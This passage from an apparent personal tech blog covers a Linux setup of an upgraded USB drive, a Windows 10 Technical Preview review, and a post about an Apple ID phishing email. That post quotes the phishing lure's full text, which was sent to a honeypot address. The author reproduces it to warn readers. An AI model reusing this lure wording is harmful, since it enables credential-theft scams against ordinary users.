Just put the 4 metal screws back, fix the S-ATA / USB -converter board, attach the power-switch -cable, the rubber tabs and put the drive back to it's place. Like this:

After attaching the aluminium cover, it was a moment of truth. Does it still work? I plugged the power-cable and USB-cable back and went to my Linux:

kernel: usb 3-1.2: new high-speed USB device number 5 using xhci_hcd
kernel: usb 3-1.2: New USB device found, idVendor=04e8, idProduct=5f06
kernel: usb 3-1.2: Product: Samsung STORY Station
kernel: usb 3-1.2: Manufacturer: JMicron
kernel: usbcore: registered new interface driver usb-storage
kernel: scsi 9:0:0:0: Direct-Access     Samsung  STORY Station         PQ: 0 ANSI: 2 CCS
kernel: sd 9:0:0:0: [sde] Very big device. Trying to use READ CAPACITY(16).

Looked really good! Checking to see what my new drive had out-of-the-box:

# parted /dev/sde print
Error: /dev/sde: unrecognised disk label
Model: Samsung STORY Station (scsi)
Disk /dev/sde: 3001GB
Sector size (logical/physical): 512B/512B
Partition Table: unknown
Disk Flags:

It had nothing. Full of zeros. Not even a partition table. I'd launched the parted and went for GPT and a new Btrfs partition:

# parted /dev/sde
GNU Parted 3.1
Using /dev/sde
Welcome to GNU Parted! Type 'help' to view a list of commands.
(parted) mklabel gpt
(parted) mkpart "Backups" ext2 17.4kB -1
Warning: You requested a partition from 16.9kB to 3001GB (sectors
33..5860531215).
The closest location we can manage is 17.4kB to 3001GB (sectors
34..5860531215).
Is this still acceptable to you?
Yes/No? yes
Warning: The resulting partition is not properly aligned for best performance.
Ignore/Cancel? i
(parted) quit
Information: You may need to update /etc/fstab.

Continuing with setup:

# ls -l /dev/sde*
brw-rw----. 1 root disk 8, 64 Dec  8 23:07 /dev/sde
brw-rw----. 1 root disk 8, 65 Dec  8 23:06 /dev/sde1

# mkfs.btrfs /dev/sde1
Btrfs v3.17
See http://btrfs.wiki.kernel.org for more information.

Turning ON incompat feature 'extref': increased hardlink limit per file to 65536
fs created label (null) on /dev/sde1
        nodesize 16384 leafsize 16384 sectorsize 4096 size 2.73TiB

Looking perfect! The JMicron thingie could handle all of the new capacity, Linux saw the USB-converter nicely:

# mount /dev/sde1 /mnt/usb/
# df -k /mnt/usb/
Filesystem      1K-blocks  Used  Available Use% Mounted on
/dev/sde1      2930265588 16896 2928139456   1% /mnt/usb

Cool! Really big numbers for capacity. Now I can manage with these couple years more.

Looks like somebody at Moldova was following The Fappening, and is getting bright ideas. I got an e-mail like this into one of my honeypot-addresses:

The fake e-mail goes like this:

Subject: Your apple id has been disabled      05/12/2014 09:44:30

Dear Customer;

We need to ask you to complete a short and brief step to securing and validating your account information.

https://appleid.apple.com

Failure to complete our validation process will result in a suspension of your Apple ID.

We take every step needed to automatically validate our users; unfortunately in your case we were unable to. The process only takes a couple of minutes and will make sure there is no interruption to your account.

I wasn't much surprised by that, becuse I don't use that account for anything serious (like Apple ID). I checked the link before clicking, obviously it wasn't to apple.com, but to a hijacked site located at Moldova. Somebody innocent was running an unpatched WordPress, and the crooks added some "bonus" content to the site. the HTML said: <meta name="generator" content="WordPress 3.5.1" />. The "apple ID" site looked pretty good (except, no HTTPS and that the address bar didn't match):

At the time of publishing this post, the victim-site has been pulled off the air, so there is no point in going there anymore.

Anyway, this is a yet another proof to be careful out there. In the Internet, most things aren't what they seem. 

Windows 10 Technical Preview has been out for two months now on Windows Insider Program. I installed it pretty much when it was released into a virtual machine and has been running a number of different software, that I'd use anyway on it.

The install process is pretty much the same than it has been since Windows 7. I created a virtual 20 GiB drive (which later turned out to be not enough) and chose to install on the non-initialized drive. No surprises there. This is what runs as out-of-box-experience:

It looks very much like Windows 8.1. Notice how the window border is quite thin. This is something Microsoft hasn't done in their operating systems ever before. Internet Explorer is still version 11 as in Windows 8.1 and the reported user-agent string is: Mozilla/5.0 (Windows NT 6.4; WOW64; Trident/7.0; rv:11.0) like Gecko.

It sees the virtual CPU incorrectly as a Xeon, however the physical CPU is of Sandy Bridge microarchitecture:

Finally the start menu is something, that I would like to use. Microsoft had a decent start menu on Windows 7, they dropped it for Windows 8 and restored a crappy version for Windows 8.1. This time it works and the stupid full-screen-apps -mode is gone. The start menu will contain both the classic and tile-based apps at the same time:

This is what computer properties and disc management look like. Pretty much the same than in Windows 7:

Also control panel is unchanged:

The version is displayed as Windows NT 6.4, but apparently it is going to change and the version number will be 10. Also IPv6 works as expected:

I don't know what the idea with forcing automatic updates on, but luckily there is a way to change that. The GUI won't let you touch it, but a direct registry hack to change it: How to disable Automatic Updates in windows 10 Tech Preview. I changed the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update value AUOptions into 3 (Automatically download and notify of installation). This is a change for previous Windowses, which are using a different registry key. See Article ID 328010 - How to configure automatic updates by using Group Policy or registry settings about it. Anyway, this is how it looks like:

One other thing I also changed, was to speed up the preview image process. As a default, new installations are on a slow track, but I wanted to get the new versions a bit faster. This is a bit funny thing, the only way to change it is to go for a new-style full-screen settings (luckily this runs in a window). There doesn't seem to be a control panel -setting for this. For details see: How to Stay Up to Date and Get the Latest Windows 10 Technical Preview Builds. This is how I changed the setting:

To upgrade into a newer build (9860 in this case) it goes something like this. I found the process quite amusing:

When the slow process completes, the bottom right corner will state the new version:

During the testing I haven't had many issues, but here is one:

For some reason system interrupts started hogging lot of CPU-resources. That is something I've never seen on any Windows. After a nice reboot, the problem disappeared. That's what you get from running beta operating system. 

Also, my original 20 GiB of disc space ran out after couple of new build upgrades. This is what happened:

There wasn't much else to do, except to shut down the Windows 10 instance. Go to virtualization host (Linux) and add 10 GiB of space into the virtual drive:
qemu-img resize Windows\ 10.qcow2 +10G

As no Windows version is capable of actually expanding the partition and file system on a grown drive, I mounted an ISO-image of GParted and booted the virtual machine from that. It could expand the system partition in a couple of seconds (it is a really good partition manager software). After having 30 GiB of space, the latest build upgraded without problems.

My thanks goes to F-Secure. I've been running their new FS Protection (still on beta) on my Windows 10 and it works really well.